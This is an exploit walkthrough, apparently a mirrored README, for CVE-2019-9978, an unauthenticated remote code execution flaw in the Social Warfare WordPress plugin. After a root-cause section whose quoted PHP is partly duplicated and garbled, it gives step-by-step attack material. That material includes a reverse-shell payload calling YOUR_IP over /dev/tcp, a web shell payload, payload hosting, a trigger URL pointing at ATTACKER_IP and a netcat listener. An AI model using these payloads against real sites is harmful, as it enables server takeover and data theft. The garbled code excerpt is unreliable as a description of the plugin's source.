Share
## https://sploitus.com/exploit?id=0529774F-FA45-5D2B-B922-08AFC4655D42
![Gemini_Generated_Image_a1skbua1skbua1sk](pictures\Gemini_Generated_Image_a1skbua1skbua1sk.png)

# ๐Ÿš€ CVE-2019-9978 โ€“ Social Warfare WordPress Plugin RCE

> **โš ๏ธ DISCLAIMER:** This repository is for **educational and authorized security testing only**. Use only on systems you own or have explicit written permission to test. Unauthorized access is illegal.

------

## ๐Ÿ“‹ Overview

| Property                    | Value                                                     |
| --------------------------- | --------------------------------------------------------- |
| **CVE ID**                  | CVE-2019-9978                                             |
| **Affected Software**       | Social Warfare Plugin โ‰ค 3.5.2 (WordPress)                 |
| **Vulnerability Type**      | Remote Code Execution (RCE) / Remote File Inclusion (RFI) |
| **Authentication Required** | โŒ **No** โ€“ unauthenticated                                |
| **CVSS Score**              | 9.8 (Critical)                                            |
| **Fixed In**                | Version 3.5.3                                             |
| **Exploited In The Wild**   | Yes โ€“ March 2019                                          |

The Social Warfare plugin is a popular WordPress plugin that adds social sharing buttons to websites. Versions **3.5.0 through 3.5.2** contain a critical RCE vulnerability that allows attackers to execute  arbitrary PHP code on the server without any authentication .

------

### what's this plugin usage ?

**Social Warfare** is a popular WordPress plugin that adds **social sharing buttons** to websites, allowing visitors to easily share content on platforms like:

- Facebook
- Twitter / X
- Pinterest
- LinkedIn
- Reddit
- WhatsApp

![Screenshot 2026-07-07 225527](pictures\Screenshot 2026-07-07 225527.png)

---

##  Root Cause Analysis

### The Vulnerable Code

```php
if ( true == SWP_Utility::debug( 'load_options' ) ) {
    // โš ๏ธ CRITICAL MISUNDERSTANDING:
    // is_admin() only checks if the page is in /wp-admin/
    // It does NOT verify authentication or user privileges!
    if ( is_admin() ) {
        wp_die( 'You do not have authorization to view this page.' );
    }

    // Step 1: Fetch remote file from user-controlled URL
    // No validation, no sanitization, no whitelist!
    $options = file_get_contents( $_GET['swp_url'] . '?swp_debug=get_user_options' );

    // Step 2: Extract content between  tags
    if ( strpos( $options, '' ) !== false ) {
        $options = str_replace( '', '', $options );
        $cutoff = strpos( $options, '' );
        $options = substr( $options, 0, $cutoff );
    }

    // Step 3: Build PHP code string
    $array = 'return ' . $options . ';';

    // Step 4: ๐Ÿ’€ CRITICAL FLAW - User-supplied code is executed!
    try {
        $fetched_options = eval( $array ); // ' ) !== false ) {
        $options = str_replace( '', '', $options );
        $cutoff = strpos( $options, '' );
        $options = substr( $options, 0, $cutoff );
    }

    $array = 'return ' . $options . ';';

    try {
        $fetched_options = eval( $array ); // ` tags. 

------

## ๐Ÿ’€ Exploitation Walkthrough

### Step 1: Identify Vulnerable Target or install a WordPress and this plugin then follow the steps

Use WPScan to identify the Social Warfare plugin version :

```bash
wpscan --url http://target.com --enumerate vp
```

- **Social Warfare** plugin version **โ‰ค 3.5.2** 

if you installed by yourself dont forget to Activate the plugin form admin panel.

------

### Step 2: Create Payload File

Create `payload.txt` with your desired payload and then make a server to serve that payload. 

example payloads :

**Test Payload (Verify RCE):**

```php
phpinfo();
```

**out of bound test:**

```
@file_get_contents('http://burp collabrator');
```

**Linux Reverse Shell:**

```bash
system("bash -c \"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\"");
```

**Interactive Command Executor:**

```php
system($_GET['cmd']);
```

------

### Step 3: Host the Payload

Start a Python HTTP server to host your payload:

```bash
python3 -m http.server 8000
```

Your payload is now accessible at: `http://YOUR_IP:8000/payload.txt` 

if you use localhost:

```
http://127.0.0.1:8000/payload.txt
```

after making the request from the vulnerable code you should see a 200 status code :

![Screenshot 2026-07-07 231039](pictures\Screenshot 2026-07-07 231039.png)

------

### Step 4: Trigger the Exploit

**Option A โ€“ Manual Trigger:**

Visit this URL in your browser or use `curl`:

```
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_IP:8000/payload.txt
```

again if you use localhost:

```
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://127.0.0.1:8000/payload.txt
```

------

### Step 5: Catch the Reverse Shell (For Reverse Shell Payloads)

```bash
nc -lvnp 4444
```

If successful, you'll get a shell! 

------

## results:

```
@file_get_contents('http://burp collabrator');
```

![Screenshot 2026-07-07 230809](pictures\Screenshot 2026-07-07 230809.png)

```
phpinfo();
```

![Screenshot 2026-07-07 230943](pictures\Screenshot 2026-07-07 230943.png)

------

## ๐Ÿ“š References

- [Unit 42 Analysis โ€“ Exploits in the Wild](https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/) 
- [CVE-2019-9978 NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2019-9978) 
- [Original Exploit-DB Entry](https://www.exploit-db.com/exploits/46794)
- [Original PoC by hash3liZer](https://github.com/hash3liZer/CVE-2019-9978) 



------

**Happy Hacking! ๐Ÿš€**